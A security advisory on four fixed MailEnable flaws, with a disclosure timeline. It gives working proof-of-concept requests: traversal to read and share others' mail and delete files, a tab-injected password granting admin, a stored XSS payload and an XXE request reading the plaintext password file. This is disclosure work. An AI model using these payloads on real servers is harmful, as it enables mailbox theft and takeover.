\ \ \_ ___ \\_ ___ \ / _____/______ ____ __ ________
/ | \/ \ \// \ \/ / \ __\_ __ \/ _ \| | \____ \
/ | \ \___\ \____ \ \_\ \ | \( <_> ) | / |_> >
\____|__ /\______ /\______ / \______ /__| \____/|____/| __/
\/ \/ \/ \/ |__|
https://www.nccgroup.com/research/
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Title Multiple Vulnerabilities in MailEnable
Release Date 10 March 2015
Reference NCC00777, NCC00778, NCC00779, NCC00780
Discoverer Soroush Dalili (@irsdl)
Vendor MailEnable
Vendor Reference http://www.mailenable.com/
Systems Affected Tested on version 8.56 (versions prior to 8.60, 7.60, 6.88, and 5.62 should
be vulnerable)
CVE Reference TBC
Risk High
Status Fixed
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Discovered 29 December 2014
Reported 03 February 2015
Fixed 26 February 2015
Published 10 March 2015
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Brief Description
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The following vulnerabilities were identified in the MailEnable application:
1) Directory Traversal
2) Privilege Escalation
3) Stored XSS
4) XXE
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
1) Directory Traversal - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The MailEnable web application was vulnerable to directory traversal without any protections.
Additionally, in some places current directory traversal protection could be bypassed by using
the "/.. /" pattern (a space character after the second dot character) rather than using the
usual "/../" pattern.
As a result it was possible to:
- Share other users' folders to read their messages
- Read other uses' messages
- Upload files in other directories by using directory traversal in the File Upload module
- Delete any files from the server by using the send email functionality
** Example 1: Sharing other users' folders to read their messages
PoC (ID and Folder parameters were affected):
The following request shared another user's INBOX:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=GRANTACCESS&Browser=2&Folder=%2F../anotherUser/Inbox&ME_ACE=EVERYONE&ME_MAILBOX_NAME=&ME_ACCESS=FUL
L&DT=1419288553278
The following request was sent to use this shared folder and enable access to another
user's emails:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=ADDCONNECTION&Browser=2&Mailbox=anotherUser&Folder=%2FInbox&DT=1419289069638
** Example 2: Reading other users' messages
PoC (ID and Folder parameters were affected - "+" sign was used to encode the space
characters):
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=GETMESSAGE&Browser=2&Folder=/X/..+/..+/anotherUser/&ID=./Inbox/DEFAULT.MAI&BODY=0&DT=141929388603
7
** Example 3: Uploading files in other directories by using directory traversal in the File
Upload module
PoC (Folder parameter was affected):
POST
/MEWebMail/Mondo/lang/sys/Forms/FLS/list.aspx?TS=1419286047604&Folder=%24FILEROOT%2f/../../../
../../ HTTP/1.1
Host: example.com
Cookie: [VALID_COOKIES_HERE]
Content-Type: multipart/form-data;
boundary=---------------------------12571835021337
Content-Length: [VALID_LENGTH]
-----------------------------12571835021337
Content-Disposition: form-data; name="__VIEWSTATE"
[VALID_VIEWSTATE_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
[VALID_VIEWSTATEGENERATOR_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="ME_SID"
[VALID_ME_SID_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="uscFileUpload$FileUploader";
filename="testfile.aspx"
Content-Type: application/octet-stream
[data here]
-----------------------------12571835021337--
** Example 4: Deleting arbitrary files from the server by using the send email functionality
PoC (ID and Folder parameters were affected - "+" sign was used to encode the space
characters):
POST /MEWebMail/Mondo/Servlet/request.aspx HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
MailEnable-SessionId: [VALID_SESSIONID_HERE]
Content-Length: [VALID_LENGTH]
Cookie: [VALID_COOKIES_HERE]
Cmd=SENDMESSAGE&ID=xxx\..+\..+\xxxxxxxxx&Folder=%5cDraftsxxxx&MsgBody=test&HTMLFormat=1&FromRecipients
=%5BDEFAULT%5D&ToRecipients=user%40test.com&CCRecipients=&BCCRecipients=&Subject=test&Priority
=3&Notify=false&PostOffice=DEFAULT&Mailbox=testuser&SessionKey=0e7a00032f33230f7c65092c540e690
620&IdentityID=[DEFAULT]&CS=Send
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
2) Privilege Escalation - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
As the username, password, and user-role parameters were stored in a plain-text file
("AUTH.TAB") without any encoding, it was possible to change the user's user-role (or add a
new user) by using a crafted password.
As an example, after changing the password to "Password12%09DEFAULT%09SYSADMIN%09%0A" (by
using a web proxy) in a change password request, the "AUTH.TAB" file was changed as follows
(delimiter was a TAB character):
testuser@DEFAULT 1 Password12 DEFAULT SYSADMIN
DEFAULT USER
Now, "testuser" could log in as an admin user (to reset other users' passwords as an example).
This was possible via the mobile version of the admin section ("/MEAdmin/Mobile/") even when
the admin panel was disabled.
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
3) Stored XSS - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The anti-XSS protection of emails in the MailEnable application was bypassed when an HTML tag
was not closed properly. As a result, it was possible to send an email containing JavaScript
code which would be executed as soon as a victim user viewed the message. An attacker could
set permanent rules for redirecting emails, hijack other emails' contents, share users'
folders, or exploit other vulnerabilities within the MailEnable application to gain admin
access to the application.
PoC ("+" sign was used to encode the space characters):
1337+Message+Body<img/src=x+onerror=alert('XSS-HERE!')+
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
4) XXE - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
There was an XXE vulnerability within the email settings by using the "Options" parameter
which accepted an XML message. As a result, it was possible to read local files or scan the
internal network. As the plain-text email passwords were stored in the "AUTH.TAB" file, it was
possible to read the passwords.
PoC:
The following request was sent to read the first line of the "AUTH.TAB" file
(with Postmaster's password) by using the Background Image URL parameter:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=SET-MBXOPTIONS&Browser=2&Options=<%3fxml+version%3d"1.0"+encoding%3d"ISO-8859-
1"%3f><!DOCTYPE+options+[+<!ELEMENT+options+ANY+>+<!ENTITY+xxe+SYSTEM+"file%3a///C:\Program+Fi
les\Mail+Enable\Config\AUTH.TAB"+>]><options><option><name><![CDATA[WebMailWatermarkURL]]></name><value>%26xxe;</value></option></options>&DT=1419127432547
After sending this request, the Postmaster's password was in the HTML response
of all the pages as it is shown below:
...
<style type="text/css">
.custBg_img
{background:url(/MEWebMail/Mondo/skins/Pacific/"Postmaster@DEFAULT 1 Password1
DEFAULT ADMIN) no-repeat;background-position:left bottom;background-repeat:no-repeat;}
.custBg_opacity {opacity:0.2;filter:Alpha(opacity=20);-msfilter:"Alpha(Opacity=20)";}
</style>
...
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Upgrade to the latest version. Fixed versions are as follows:
Version 8.60 (the current version)
Version 7.60
Version 6.88
Version 5.62
Release notes are as follows:
http://www.mailenable.com/Standard-ReleaseNotes.txt
http://www.mailenable.com/Professional-ReleaseNotes.txt
http://www.mailenable.com/Enterprise-ReleaseNotes.txt
http://www.mailenable.com/Premium-ReleaseNotes.txt
https://www.mailenable.com/Premium-ReleaseNotes5.txt
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Research https://www.nccgroup.com/research
Twitter https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
Open Source https://github.com/nccgroup
Blog https://www.nccgroup.com/en/blog/cyber-security/
SlideShare http://www.slideshare.net/NCC_Group/